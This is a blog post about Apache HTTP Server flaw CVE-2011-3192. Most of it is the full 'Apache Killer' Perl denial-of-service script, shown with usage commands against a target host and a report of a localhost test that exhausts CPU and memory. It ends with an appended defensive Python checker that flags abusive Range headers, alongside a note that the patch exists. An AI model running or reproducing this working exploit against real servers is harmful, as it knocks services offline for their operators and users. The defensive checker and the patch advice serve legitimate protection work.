APACHE DoS Vulnerability (CVE-2011-3192)

Just a heads-up (many of you probably know already): there is a vulnerability in Apache HTTP Server 1.3.x and 2.x.x up to 2.2.19.

In the mitre.org vulnerability database it is listed as CVE-2011-3192; click here for the full details.

The vulnerability exploits a weakness in how Apache httpd handles Range requests, exhausting the server's processor and memory.

Apache.org has patched it by releasing the new version 2.2.20 on 31 August 2011.

Below is the script from Pastebin (sorry, I forgot to copy the link, just use your google-fu), called Apache Killer:

#!/usr/bin/perl

#Apache httpd Remote Denial of Service (CPU  & memory exhaustion)
#Original by Kingcope
#Altered by W
#Year 2011
#
# Will result in swapping memory to filesystem on the remote side
# plus killing of processes when running out of swap space.
# Remote System becomes unstable.
#

use IO::Socket;
use threads;

sub usage
{
print "Apache Remote Denial of Service (CPU & memory exhaustion)\n";
print "Originally by Kingcope\n";
print "Altered to use threads by W\n";
print "Usage: $0 <attack> <host> [page=/] [threads=50]\n";
print "Example: $0 YES www.example.com index.html 50\n";
print "If attack is anything other than 'YES', then the tool will test and exit.\n";
}

sub testapache
{
print "Testing for partial content exploit against $host$path...\n";

my $sock = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => "80",
Proto    => 'tcp') or die "Can't open socket to $host!\n";

my $p = "HEAD $path HTTP/1.1\r\nHost: $host\r\nRange:bytes=0-5\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
print $sock $p;

my $x = <$sock>;
if ($x =~ /Partial/)
{
print "Host: $host appears to be vulnerable to partial content DoS\n";
return 1;
} else {
print "Host: $host appears to not be vulnerable, returned:\n$x";
return 0;
}
}

sub exploitserver
{
my $sock = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => "80",
Proto    => 'tcp') or return(0);
print $sock $p;

while(<$sock>)
{
}
print ".";
}

if($#ARGV < 1)
{
&usage && exit;
}

$real = ($ARGV[0] eq 'YES');
$host = $ARGV[1];
$path = ($#ARGV > 1) ? '/' . $ARGV[2] : '/';
$numthreads = ($#ARGV > 2) ? $ARGV[3] : 50;
$vuln = &testapache;

srand(time());
my $r = "";

for ($k=0;$k<1300;$k++)
{
$r .= ",5-$k";
}

$p = "HEAD $path HTTP/1.1\r\nHost: $host\r\nRange:bytes=0-5$r\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
if($vuln && $real)
{
my @threads;
$|=1;

print "Running partial content exploit against $host$path using $numthreads threads\n";
for(my $n = 0; $n < $numthreads; $n++)
{
my $thr = async { while(1){ &exploitserver; } };
push(@threads, $thr);
}
foreach(@threads)
{
$_->join();
print($_);
}
}

The script above is used as follows:
1. to find out whether the Apache web server is vulnerable or not

perl filename.pl www.target.com

2. to carry out the exploitation

perl filename.pl YES www.target.com

 

This is what I tried on localhost on BT5 with Apache version 2.2.14:

and the result looks like this:

Look at Cpu(s): 92.5%us and Mem:   3094072k total, 2748296k used,   345776k free; also look at the Apache2 services with different PIDs below them.

Our processor and RAM are made to work at their maximum, which will certainly cause the server to go out of service…

So update your Apache server right away 🙂

Hope this is useful
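Seen from the server side, the Range header built by the script's loop stands out by how many ranges it carries and how heavily they overlap. The check below is an added example, not part of the original script or of Apache; the function names and the thresholds MAX_RANGES and MAX_OVERLAPS are assumptions chosen for illustration.

```python
import re

# Assumed thresholds for this example (not from the page); tune per site.
MAX_RANGES = 5
MAX_OVERLAPS = 1

_SPEC = re.compile(r"^\s*(\d*)\s*-\s*(\d*)\s*$")

def parse_ranges(value):
    """Parse a Range header value into (first, last) pairs, or None if malformed.
    'N-' gives (N, None); a suffix range '-N' gives (None, N)."""
    unit, sep, specs = value.partition("=")
    if not sep or unit.strip().lower() != "bytes":
        return None
    pairs = []
    for spec in specs.split(","):
        m = _SPEC.match(spec)
        if not m or not (m.group(1) or m.group(2)):
            return None
        pairs.append(tuple(int(g) if g else None for g in m.groups()))
    return pairs

def count_overlaps(pairs):
    """Count ranges starting at or before the furthest byte already covered."""
    spans = sorted((f, float("inf") if l is None else l)
                   for f, l in pairs if f is not None)
    overlaps, reach = 0, -1
    for first, last in spans:
        if first <= reach:
            overlaps += 1
        reach = max(reach, last)
    return overlaps

def assess(value):
    """Return (verdict, range_count, overlap_count) for one Range header value."""
    pairs = parse_ranges(value)
    if pairs is None:
        return ("malformed", 0, 0)
    overlaps = count_overlaps(pairs)
    bad = len(pairs) > MAX_RANGES or overlaps > MAX_OVERLAPS
    return ("suspicious" if bad else "ok", len(pairs), overlaps)

if __name__ == "__main__":
    # Constructed samples: an ordinary request, a two-part request, and the
    # value produced by the script's loop (0-5 followed by 5-0 ... 5-1299).
    flood = "bytes=0-5" + "".join(",5-%d" % k for k in range(1300))
    for sample in ("bytes=0-499", "bytes=0-99,200-299", flood):
        print(assess(sample), sample[:40])
```

The same function can be run over Range values pulled from request logs or a proxy to flag clients sending this pattern to servers that have not yet been updated.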
M

Sources:

  • https://infosecisland.com/blogview/16214-Apache-Killer-DoS-Vulnerability-Patch-Released.html
  • https://httpd.apache.org/security/vulnerabilities_22.html
  • https://tanyarezaervani.wordpress.com/2011/09/02/artikel-khusus-menyerang-server-dengan-apache-killer/
  • Pastebin
